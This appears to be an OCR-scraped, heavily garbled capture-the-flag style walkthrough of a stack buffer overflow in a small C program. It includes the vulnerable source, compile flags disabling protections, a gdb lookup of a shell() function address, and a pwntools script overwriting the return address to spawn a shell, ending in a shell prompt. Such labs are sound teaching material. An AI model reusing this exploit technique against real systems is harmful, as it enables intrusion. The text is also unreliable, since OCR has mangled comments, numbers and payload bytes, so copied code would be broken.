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Bypass Something 537!
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#include <stdio.h>
#include <unistd.h>

#include <string.h>

void init() {
setvbuf(stdin, @, 2, @); // HT
setvbuf(stdout, @, 2, @); // == U= HIHZ H[=ZMHs!

}
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void shell()

{
char *cmd = "/bin/sh”; // 2L shelll| 2 7i2|7|= ZQIH
char *args[] = {cmd, NULL}; // execve ©==0f FE< uij
execve(cmd, args, NULL); // shellS 2&ol= B+ ==

h

int main()

char buf2[exi6]; // 2237|2| HI
char buf[ex1e]; // 1637|2| H{T

init();

printf("Input: ");
scanf("%23s", buf2); // buf20l Z|C§ 233 7|7A| =S BH=CF,

// buf2?t stackbufferoverflowphidt LX|SH=A| =Q
if(!strncmp(butf2, “"stackbufferoverflowphl®”, 22))

{

printf("Go: ");

scanf("%s", buf); // bufl 2I=HEt7]|
¥

return @;
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vold 1mit() {

setvbuf(stdin, @, 2, @); // H&
setvbuf(stdout, @, 2, 0); // =5

B Mo

}
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vold shell()
1

char *cmd = "/bin/sh"; // 2T shelll| 425 7i2|7|= EPIH
char *args[] = {cmd, NULL}; // execve S0 FE= HIZE

=l

execve(cmd, args, NULL); // shellS 2E0I= 2+ Z=
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000

1 int main()

2 {

3 char buf2[exie6]; // 2237|2| HIj

A char buf[ex1e]; // 1637]2| HIH

5

6 init();

7

8 printf("Input: ");

: scanf("%23s", buf2); // buf20i| =L 233 7|7 YEHS
16

11 // buf2?l stackbufferoverflowph1d} ZX[St=A]| =2
12 if(!strncmp(buf2, "stackbufferovertlowphl™, 22))
e {

14 printf(“Go: ");

15 scanf("%s", buf); // bufOll YELY|

16 1

17

18 return ©;

19 }




=X| =0




=X| =0

900

1 1int main()

2 {

3 char buf2[exie]; // 2237|2| H I

a char buf[exie]; // 1637|°| HIj

5

6 init();

7

8 printf{"Input: ");

9 scanf("%23s", buf2); // buf2Cl =L 233 7|7HA| ©Hs Br=LF,
1@

11 // buf2?l stackbufferoverflowph1d} ZXA|St=A| =l
12 if(!strncmp(buf2, "stackbufferoverflowphil™, 22))
13 f

14 printf(“Go: ");

15 scanf("%s", buf); // buf0 U7

16 1

17

18 return 6;

19 }
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900
1 1int main()
2
3 char buf2[exie]; // 22372 HIj
a char buf[exie]; // 1637|°| HIj
5
6 init();
/
8 printf("Input: ");
9 scanf("%23s", buf2); // buf20l Z[Cf 233 7[7HA| EeHs Br=LF,
1@
11 // buf2?l stackbufferoverflowphid} ZX|ot=A| =2l
12 if(!strncmp{buf2, "stackbufferoverflowphl™, 22))
e {
14 printf(“Go: ");
15 scanf("%s", buf); |// bufOf LY
16 1
17
18 return @;
19 }
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900

1 1int main()

2 {

3 char buf2[exie]; // 2237[°| HIj

A char buf[exie]; // 1637]|2| HIH

5

6 init();

7

8 printf("Input: ");

: scanf("%23s", buf2); // buf20l| E|Cf 2337|7HX] YHS BH=C
18

11 // buf2?l stackbufferoverflowph1d} ZXA[St=A] =0
12 if(!strncmp(buf2, "stackbutferoverflowphl™, 22))
13 {

14 printf(“Go: ); .

15 scanf("%s"™, buf); ;’(Eu%ﬂ%%@” X‘”Ol_l' X
16 1

17

18 return e;

19 }
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900

1 1int main()

2 {

3 char buf2[exie]; // 2237|2| HIj

a char buf[exie]; // 1637|2| H{I

5

6 init();

7

8 printf{"Input: ");

: scanf("%23s", buf2); // buf20l ZCf 2337|7HX| YHE
16

11 // buf2?l stackbufferoverflowphid} ZA|ot=A| =2
12 if(!strncmp{buf2, "stackbufferoverflowph1l™, 22))
13 {

14 printf(“Go: ");

15 scanf("%s", buf); // buf0 U=

16 1

17

18 return ©;

19 }
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1$ gcc -0 sbof sbof.c -fno-stack-protector -no-pie
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1$ gcc -0 sbof sbof.c -fno-stack-protector -no-pie
2 $ ./sbof
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1$ gcc -0 sbof sbof.c -fno-stack-protector -no-pie
2 $ ./sbof
3 Input:
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1$ gcc -0 sbof sbof.c -fno-stack-protector -no-pie
2 $ ./sbof
G a]o]Vi SV VAVAVAVAVAVAVAY
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1$ gcc -0 sbof sbof.c -fno-stack-protector -no-pie
2 $ ./sbof
G a]o]Vi SV VAVAVAVAVAVAVAY
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1$ gcc -0 sbof sbof.c -fno-stack-protector -no-pie
2 $ ./sbof

3 Input: stackbufferoverflowph

4 Go:
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_ < stackbufferoverflowph?

- éIAI*ZZ
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©RET. < shell]
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1$ gdb sbof -q
2 pwndbg> print shell
3 $1 = {<text variable, no debug info>} 0x4011dd
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00

1 from pwn import *

2

3 p = process( ./sbot’)

]

5 payload = b'A" * ox10 # buf *F7|

payload += b"B" * ox8 # sfp A7
payload += b"\x40\x11\xdd\xe0\x00\x00\xee\xe0" # |5 FTA4E5 shell= 7|

W QO =]

p.send((b'stackbufferoverflowph1')) # £ BIEA|Z|7]
10 p.send(payload) # HO[ZE F &

11

12 p.1interactive()
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|+] Starting local process "./sbof": pid 28594
[*] Switching to interactive mode

>
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|+] Starting local process './sbof": pid 28594
[*] Switching to interactive mode

$id
uid=1000(sbof) gid=1000(sbof) groups=1000(sbof)
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